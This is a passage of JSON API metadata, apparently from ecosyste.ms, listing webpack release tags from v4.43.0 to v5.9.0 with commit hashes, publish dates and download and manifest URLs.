tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo